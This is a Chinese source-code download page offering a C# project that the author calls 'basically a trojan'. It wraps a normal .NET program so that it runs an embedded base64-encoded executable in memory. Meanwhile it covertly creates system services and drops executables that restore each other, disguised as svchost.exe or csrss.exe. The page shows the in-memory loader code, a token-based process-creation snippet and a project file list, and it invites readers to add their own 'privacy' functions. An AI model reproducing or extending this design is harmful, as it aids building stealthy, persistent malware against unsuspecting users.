资源简介
此程序仅做参考之用,不要运行里面的exe,否则后果自负。先看里面的说明。
此程序只使用C#编写,功能是将一个正常的程序添加上其他操作。
将一些程序生成字符串,在一个程序里运行,差不多就是在内存里运行程序,
static void Main()
{
string str_Normal = Code_Resource.str_Normal; //取得exe文件生成的base64串
byte[] ns = Convert.FromBase64String(str_Normal); //生成byte[]
Assembly asm_n = Assembly.Load(ns); //运行byte[]
MethodInfo info_n = asm_n.EntryPoint;
ParameterInfo[] parameters_n = info_n.GetParameters();
info_n.Invoke(null, null);
}
这个程序需要执行的代码都在 资源文件 里面。
运行Replica_Prg这个里面的,看到的是Normal_Soft的效果,同时背地里建立多个系统服务、释放多个exe、exe和系统服务相互释放。
因为只使用C#编写,所以只能对.net编写的exe进行转码运行。
可以包装一个常用的.net的exe文件,在里面添加执行其他的.net的exe,差不多就是木马。
此程序只是编译过了,并没有实际运行。
因为要删除这个程序太恶心了,隔几十秒就检测释放,多个系统服务和exe交互释放。
为了便于删除,没检测判断每个服务是否被停掉,重启。
为了便于删除,生成的都在c:\temp里面,生成的可以起个好听的名字,比如svchost.exe、csrss.exe什么的。
有的程序可能忘了添加修改app.manifest(就是管理员模式运行),自行修改,
功能没写,需要执行什么隐私功能自行添加,
有些可能忘写判断了,用try{}没报错,自己添加。
此程序只是编译过了,并没有实际运行检测,可能有些逻辑环节没执行到,或转码重复或有误,自行修正。
程序只是说明性质的,如有兴趣自己去运行、修改。
此程序只使用C#编写,功能是将一个正常的程序添加上其他操作。
将一些程序生成字符串,在一个程序里运行,差不多就是在内存里运行程序,
static void Main()
{
string str_Normal = Code_Resource.str_Normal; //取得exe文件生成的base64串
byte[] ns = Convert.FromBase64String(str_Normal); //生成byte[]
Assembly asm_n = Assembly.Load(ns); //运行byte[]
MethodInfo info_n = asm_n.EntryPoint;
ParameterInfo[] parameters_n = info_n.GetParameters();
info_n.Invoke(null, null);
}
这个程序需要执行的代码都在 资源文件 里面。
运行Replica_Prg这个里面的,看到的是Normal_Soft的效果,同时背地里建立多个系统服务、释放多个exe、exe和系统服务相互释放。
因为只使用C#编写,所以只能对.net编写的exe进行转码运行。
可以包装一个常用的.net的exe文件,在里面添加执行其他的.net的exe,差不多就是木马。
此程序只是编译过了,并没有实际运行。
因为要删除这个程序太恶心了,隔几十秒就检测释放,多个系统服务和exe交互释放。
为了便于删除,没检测判断每个服务是否被停掉,重启。
为了便于删除,生成的都在c:\temp里面,生成的可以起个好听的名字,比如svchost.exe、csrss.exe什么的。
有的程序可能忘了添加修改app.manifest(就是管理员模式运行),自行修改,
功能没写,需要执行什么隐私功能自行添加,
有些可能忘写判断了,用try{}没报错,自己添加。
此程序只是编译过了,并没有实际运行检测,可能有些逻辑环节没执行到,或转码重复或有误,自行修正。
程序只是说明性质的,如有兴趣自己去运行、修改。
代码片段和文件信息
using System;
using System.Runtime.InteropServices;
using System.Security.Principal;
namespace ConsoleWithWindowsService
{
class Interop
{
public static void CreateProcess(string app string path)
{
bool result;
IntPtr hToken = WindowsIdentity.GetCurrent().Token;
IntPtr hDupedToken = IntPtr.Zero;
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
sa.Length = Marshal.SizeOf(sa);
STARTUPINFO si = new STARTUPINFO();
si.cb = Marshal.SizeOf(si);
int dwSessionID = WTSGetActiveConsoleSessionId();
result = WTSQueryUserToken(dwSessionID out hToken);
if (!result)
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
..A..H. 41984 2017-10-01 00:54 Run_1\.vs\Run_1\v14\.suo
文件 189 2017-09-30 23:30 Run_1\App.config
文件 26112 2017-10-01 00:52 Run_1\bin\Debug\Run_1.exe
文件 189 2017-09-30 23:30 Run_1\bin\Debug\Run_1.exe.config
文件 17920 2017-10-01 00:52 Run_1\bin\Debug\Run_1.pdb
文件 22696 2017-10-01 00:54 Run_1\bin\Debug\Run_1.vshost.exe
文件 189 2017-09-30 23:30 Run_1\bin\Debug\Run_1.vshost.exe.config
文件 490 2017-03-19 05:00 Run_1\bin\Debug\Run_1.vshost.exe.manifest
文件 42 2017-10-01 00:54 Run_1\obj\Debug\Run_1.csproj.FileListAbsolute.txt
文件 957 2017-09-30 23:40 Run_1\Program.cs
文件 1318 2017-09-30 23:30 Run_1\Properties\AssemblyInfo.cs
文件 2823 2017-09-30 23:30 Run_1\Properties\Resources.Designer.cs
文件 5612 2017-09-30 23:30 Run_1\Properties\Resources.resx
文件 1092 2017-09-30 23:30 Run_1\Properties\Settings.Designer.cs
文件 249 2017-09-30 23:30 Run_1\Properties\Settings.settings
文件 4002 2017-09-30 23:35 Run_1\Run_1.csproj
文件 976 2017-09-30 23:30 Run_1\Run_1.sln
文件 3696 2017-09-30 23:35 Run_1\Service_Resource.Designer.cs
文件 24331 2017-09-30 23:35 Run_1\Service_Resource.resx
..A..H. 40960 2017-10-01 00:56 Run_app\.vs\Run_app\v14\.suo
文件 189 2017-09-30 20:18 Run_app\App.config
文件 10240 2017-09-30 21:44 Run_app\bin\Debug\Run_app.exe
文件 189 2017-09-30 20:18 Run_app\bin\Debug\Run_app.exe.config
文件 15872 2017-09-30 21:44 Run_app\bin\Debug\Run_app.pdb
文件 22696 2017-10-01 00:54 Run_app\bin\Debug\Run_app.vshost.exe
文件 189 2017-09-30 20:18 Run_app\bin\Debug\Run_app.vshost.exe.config
文件 3335 2017-09-30 20:20 Run_app\bin\Debug\Run_app.vshost.exe.manifest
文件 46 2017-10-01 00:54 Run_app\obj\Debug\Run_app.csproj.FileListAbsolute.txt
文件 1559 2017-09-30 21:43 Run_app\Program.cs
文件 3335 2017-09-30 20:20 Run_app\Properties\app.manifest
............此处省略191个文件信息
- 上一篇:开源的类库DotNetCodes C#
- 下一篇:C# 播放音乐
相关资源
- ASP.NET MVC5考试_管理系统源码
- c#入门经典 第七版 中文版 非扫描版
- .netc#新手菜鸟mvc5的仓库管理系统 so
- dc竞赛房租处理数据
- 基恩士PLC通讯.rar
- C# NPOI生成word插入图片和表格
- C#程序设计基础C#程序设计及应用教程
- 深入.NET平台和C#编程
- .net 美萍超市管理系统源码C#
- 第二代Kinect WPF开发从入门到精通资料
- WinForm GeckoFx33 Demo JS与C#互交 窗口浏览
- 《ASP.NET程序设计项目教程》周虎,王
- [精通ASP.NET.MVC5英文原版
- Focas V4.0 带说明
- 计算机图形学 三维模型处理算法初步
- C# KTV 点歌系统,C#项目源码带数据库
- C#实验--A.1 视频动态绘制练习.
- c#实现动态规划法——求解矩阵连乘问
- c#winform中完美代替WebBrowser最新的控件
- 最新 Ext甘特图控件 + Ext日程控件 破解
- C#高级编程第9版:C#5.0 & .NET 4.5.1 par
- ASP.NET WebAPI+mvc4.0+EasyUI快速开发框架
- Illustrated C# 2010 C# 4.0图解教程
- Codejock Xtreme Suite Pro ActiveX 15.3.1 零售版
- C# WINFORM框架源碼
- C# WinForm实践开发教程清晰版
- 3D打印机上位机源码Reprap Host 是C#写的
- C#设计模式+源码JamesW.Cooper.zip
- C#程序开发范例宝典(第3版).(配套
- asp.net mvc 网上书店系统
评论
共有 条评论